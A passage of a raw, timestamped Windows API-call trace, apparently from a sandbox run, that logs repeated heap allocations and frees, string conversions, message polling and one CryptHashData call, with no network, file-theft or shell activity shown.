Flags=0x0, Size=0x4) returned 0x2e54e28 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0175.147] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0175.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0175.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0175.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0175.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e88 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0175.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0175.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0175.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0175.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0175.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0175.148] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0175.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0175.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0175.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e18 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0175.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0175.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0175.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0175.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0175.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0175.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0175.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e98 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0175.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0175.152] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0175.152] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.152] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0175.153] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0175.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0175.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0175.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0175.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0175.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0175.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0175.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0175.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0175.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0175.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0175.155] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0175.155] CryptHashData (hHash=0xa873d0, pbData=0x2e54e88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0175.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0175.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0175.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0175.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0175.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0175.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0175.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0175.158] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0175.159] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0175.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0175.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | 